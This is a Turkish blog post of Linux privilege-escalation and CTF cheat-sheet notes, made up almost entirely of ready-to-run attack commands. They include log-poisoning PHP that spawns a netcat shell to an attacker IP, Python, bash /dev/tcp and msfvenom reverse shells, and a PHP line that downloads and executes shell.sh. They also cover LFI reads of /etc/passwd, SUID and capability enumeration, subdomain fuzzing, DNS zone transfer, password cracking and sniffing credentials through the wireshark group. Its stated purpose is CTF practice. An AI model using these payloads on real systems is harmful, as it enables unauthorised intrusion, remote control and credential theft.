Linux Priv Esc. Notes


http://192.168.254.175/index.php?log=/var/log/nginx/access.log

<?php system ('nc -e /bin/sh 192.168.254.128 777'); ?>


derleme hatası
(gcc)
PATH=PATH$:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/;export PATH

rbash atlatma
ssh id@ip sh
ssh -X id@ip


cat -> less

python -c 'import pty;pty.spawn("/bin/bash")'
bash -i

export=XTERM
export TERM=xterm

kullanıcı wireshark grubuna aitse konsola wireshark yazılıp,tüm protokollerden gelen istekleri (k.adı parola) incelenir.


lsb_release -a

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.128",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
msfvenom -p cmd/unix/reverse_python lhost=192.168.1.108 lport=9876 R    --> 

wpscan --url http://derpnstink.local/weblog -e vt,tt,u,vp,cb,dbe


lfi tarayıcıda görüntü vermiyorsa
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.254.200/administrator/alerts/alertConfigField.php |grep sbin




find / \( -perm -u+s -or -perm -g+s  \) -type f -exec ls -l {} \;
find . -perm /4000 
find . -perm /6000
find / -user root -perm -002 -type f -not -path "/proc/*"  2>/dev/null


https://github.com/GTFOBins/GTFOBins.github.io

getcap -r / 2>/dev/null


An Interesting Privilege Escalation vector (getcap/setcap)

https://linux.die.net/man/7/capabilities




Linux Privilege Escalation Checklist

https://0x1.gitlab.io/exploit/Linux-Privilege-Escalation/



https://github.com/DominicBreuker/pspy --process



wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O /tmp/ZafiyetTespiti.sh
md5sum /tmp/ZafiyetTespiti.sh

wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.votenow.local" --hw 854 --hc 400 $ip 
dig @192.168.254.245 greenoptic.vm axfr


/var/www/.htpasswd   -->  browser üzerinde ftp veya başka bir servis gibi olan parolası
/var/mail/USERS

john --w=/usr/share/wordlists/rockyou.txt php


smbclient -L ip
smbclient \\\\<ip>\\dizin

------
shell.sh --> bash -i >& /dev/tcp/192.168.254.128/5555 0>&1
select '<?php system("wget 192.168.254.128/shell.sh; chmod +x shell.sh; bash shell.sh");exit;?>'
-----

www-data@e71b67461f6c  --> docker users

ctf , linux , linux priv esc , linux privilege escalation , siber güvenlik , web ctf
Bu yazıyı beğendin mi ?0000

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir